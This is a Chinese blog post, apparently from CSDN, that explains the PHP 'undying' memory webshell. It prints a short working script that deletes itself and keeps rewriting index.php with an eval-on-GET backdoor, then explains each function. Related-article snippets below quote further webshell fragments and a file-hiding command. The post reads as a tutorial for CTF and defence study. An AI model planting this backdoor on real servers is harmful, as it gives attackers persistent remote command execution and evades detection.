PHP内存马：不死马

Shadow_143

于 2024-10-29 23:03:51 发布

阅读量779

点赞数 13

文章标签： php android 开发语言

本文链接：https://blog.youkuaiyun.com/weixin_73442302/article/details/143352200

版权

内存马概念

内存马是无文件攻击的一种常用手段，利用中间件的进程执行某些恶意代码。首先要讲的是PHP不死马，实质上就是直接用代码弄一个死循环，强占一个 PHP 进程，并不间断的写一个PHP shell，或者执行一段代码。

不死马剖析

<?php
    set_time_limit(0);
    ignore_user_abort(1);
    unlink(__FILE__);
    while (1) {
        $content = '<?php @eval($_GET["cmd"]);?>';
        file_put_contents("index.php", $content);
        usleep(10000);
    }   
?>

set_time_limit()函数：设置允许脚本运行的时间，单位为秒（如果设置该运行时间，sleep()函数在执行程序时的持续时间将会被忽略掉）
ignore_user_abort()函数：函数设置与客户机断开是否会终止脚本的执行（如果设置为True，则忽略与用户的断开）
unlink(__FILE__)函数：删除文件（防止文件落地被检测工具查杀）
file_put_contents函数：将一个字符串写入该文件中
usleep函数：延迟执行当前脚本数微秒，即条件竞争

需要特别注意的是，执行 unlink(__FILE__) 并不会删除正在运行的 PHP 脚本本身，因为脚本在执行过程中已经被加载到内存中。相反，它会删除磁盘上的文件，如果文件正在被其他进程使用，删除操作可能会失败。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Shadow_143

关注关注

13
点赞
踩
7

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

PHP内存马技术研究与查杀方法总结

不忘初心，护天下安全！

06-28

1071

内存马是无文件攻击的一种常用手段，随着攻防演练热度越来越高：攻防双方的博弈，流量分析、EDR等专业安全设备被蓝方广泛使用，传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到，内存马使用越来越多。由客户端发起的Web请求后，中间件的各个独立的组件如Listener、Filter、Servlet等组件会在请求过程中做监听、判断、过滤等操作，内存马就是利用请求过程在内存中修改已有的组件或动态注册一个新的组件，插入恶意的shellcode，达到持久化控制服务器的目的传统的Webshell

不死码之内存码

G653214的博客

11-16

1466

内存马，通俗将就是不死????，就是会运行一段时间不退出的程序常驻PHP进程里，无限循环。生成过程：不死???? --> 上传到server --> server执行文件 --> server本地无线循环生成(一句话.php) 两种不死????：网上流传的不死???? ignore_user_abort(true)：函数设置与客户几断开是否会终止脚本的执行。这里设置位true则忽略与用户的断开，即使与客户机断开脚本仍会执行 set_time_limit()：函数设置脚

参与评论您还未登录，请先登录后发表或查看评论

PHP不死马

qq_50822277的博客

07-22

388

php不死马，下面只是基础不死马。可以根据自己要求自行更改和改进。缺点：重启服务，即可删除，但是灵活性高。

关于PHP不死马的分析和总结

weixin_52501704的博客

10-16

2240

关于PHP不死马的分析和总结

不死马php如何取证_php不死马如何删除

weixin_39669075的博客

12-21

531

什么是不死马？内存马，通俗讲就是不死马，就是会运行一段永远不退出的程序常驻在PHP进程里，无限执行。生成过程 (推荐学习：PHP视频教程)不死马.php → 上传到server → server执行文件 → server本地无限循环生成 (一句话.php)网上流传的不死马...

Windows权限维持之php不死马、映像劫持、策略组脚本

Longwaer

01-09

1416

通过学习掌握Windows权限维持手段，提升在个人知识小技巧，更快的知晓权限维持的作用性。

PHP内存马介绍

派大星的博客

02-28

3488

PHP内存马介绍

Php内存马,php中的内存管理的介绍

weixin_36400833的博客

03-19

240

本篇文章给大家带来的内容是关于php中的内存管理的介绍，有一定的参考价值，有需要的朋友可以参考一下，希望对你有所帮助。一、php内存管理概述——Zend引擎由于计算机的内存由操作系统进行管理，所以普通应用程序是无法直接对内存进行访问的。应用程序只能向操作系统申请内存，通常的应用也是这么做的，在需要的时候通过类似malloc之类的库函数向操作系统申请内存。在一些对性能要求较高的应用场景下是需要频繁...

内存马介绍及分析-带查杀工具tomcat memshell scanner.jsp

weixin_65629944的博客

12-18

1304

先判断是通过什么方法注入的内存马，可以先查看web日志是否有可疑的web访问日志，如果是filter或者listener类型就会有大量url请求路径相同参数不同的，或者页面不存在但是返回200的，查看是否有类似哥斯拉、冰蝎相同的url请求，哥斯拉和冰蝎的内存马注入流量特征与普通webshell的流量特征基本吻合。4.java VisualVM工具：是一款免费的，集成了多个 JDK 命令行工具的可视化工具，它能为您提供强大的分析能力，对 Java 应用程序做性能分析和调优。cmd=后跟命令即可。

PHP内存型木马

Mi1k7ea

12-09

8074

基本概念 PHP内存性木马即PHP不死马，一般会删除自身以进程的形式循环创建隐蔽的后门。通常在AWD Web题中用得较多。 Demo及原理 nodie.php <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '/var/www/dvwa/.ski12.php'; $...

MemShellDemo:内存马Demo合集 memshell demo for java php python

05-13

内存马Demo :light_bulb: 介绍本项目为各类内存马的Demo合集。本代码仅供学习，仅供学习交流，请勿用于非法和商业用途，否则后果自负。 :sparkles: 分析 PHP内存马 Java内存马（基于java instrumentation && retransform） flask内存马 :houses: 检测工具检测工具由于商业化原因，暂不开源。可自行根据检测原理设计方案，如想交流技术可添加WX。 :hammer_and_wrench: todo redefine字节增强型（冰蝎内存马） go django java扩展中间件（目前只有tomcat）

awd网络攻防赛常用的不死马，超强

10-30

以上是不死马的代码，pass=R_Hacker. 采用了md5加密。

AWD-----监控&不死马&垃圾包&资源库

qi_SJQ_的博客

02-27

4500

1.知识: AWD规则: 2.防守-----流量监控-----实时获取访问数据包流量利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作，确保写入后门操作失效，也能确保分析到无后门攻击漏洞的数据包便于后期利用分析有后门或无后门的攻击行为数据包找到漏洞进行修复分析到成功攻击的数据包进行自我利用，用来攻击其他队伍安恒的awf部署比较麻烦，比赛时系统日志不太好用，因此用日志分析监控的脚本好，可以实时生成日志。推荐项目：AWD_Hunter-master 3.攻击-----

PHP一句话木马免杀(2)

小刚的博客

10-14

913

作者：小刚一位苦于信息安全的萌新小白帽，记得关注给个赞，谢谢本实验仅用于信息防御教学，切勿用于其它用途 PHP木马免杀小技巧免杀小技巧1.隐藏php文件。2.逻辑判断木马3.数字运算构造木马4.内存木马，也称不死马。小结免杀小技巧 1.隐藏php文件。在windows下有个attrib命令，能够帮助我们实现文件的隐藏。 atttrib +s +a +h +r shell.php #隐藏 atttrib -s -a -h -r shell.php #显示 2.逻辑判断木马 <? @eval.

关于Java/Python/PHP 内存马

2301_80115097的博客

11-15

1213

因为内存马种类繁杂，每次都要翻看很多文章，又加上最近有某个大活动，因此就写了这篇文章来总结一下常见的3种语言（PHP、Python、JAVA）的内存马的注入方法和查杀方法，并尝试自己完成一个内存马查杀工具的实现。希望本篇文章能给师傅们带来一些启发。文章一长就难免在表达和准确性上有所疏漏，如有错误或不足，请师傅们指正。

php内存马怎么调用,PHP 函数运行的内存

weixin_30260621的博客

03-12

164

函数在运行期间占用的内存，在运行结束后会被回收。但是还有问题不明白，函数内部的echo在函数执行结束后还占用内存吗？？？//PHP 函数执行完内存就会被收回function test(){echo '函数内部开始监测内存:', memory_get_usage(), ''; //为什么这里统计内存和下面统计内存的结果值一样呢？？？？echo '函数内部二次监测内存:', memory_get_u...

php的内存马的原理与查杀方法

遇事不决冲冲冲

08-11

7932

内存马原理 PHP内存马即PHP不死马，简单来说就是会写进PHP进程里，无限在指定目录中生成木马文件生成过程不死马.php → 上传到server → server执行文件 → server本地循环不断生成一句话木马不死马初代 <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '2.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91

linux php测试,windows/linux下php内存马测试

weixin_42295528的博客

03-11

286

ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = 'ma_test.php';$code = '';while (1) {file_put_contents($file, $code);//system('touch -m -d "2018-12-01 09:10:12" ma_test.php');$ntime=...

php不死马如何kill,awd攻防之kill 不死马

weixin_33278577的博客

03-22

1873

1.pwn题目题目预设条件：官方给了一个ctf用户给我们，并且用一个root权限的守护进程去监听一个给定的端口，并且会不断以test用户启动名为game的服务(题目)。ctf用户可以直接使用 su test 切换到test用户。这样一个环境可以用这样一条命令去完成：sudo socat tcp4-listen:2019,fork exec:"sudo -u test ./game"#注：后面的ga...

如何查杀php不死马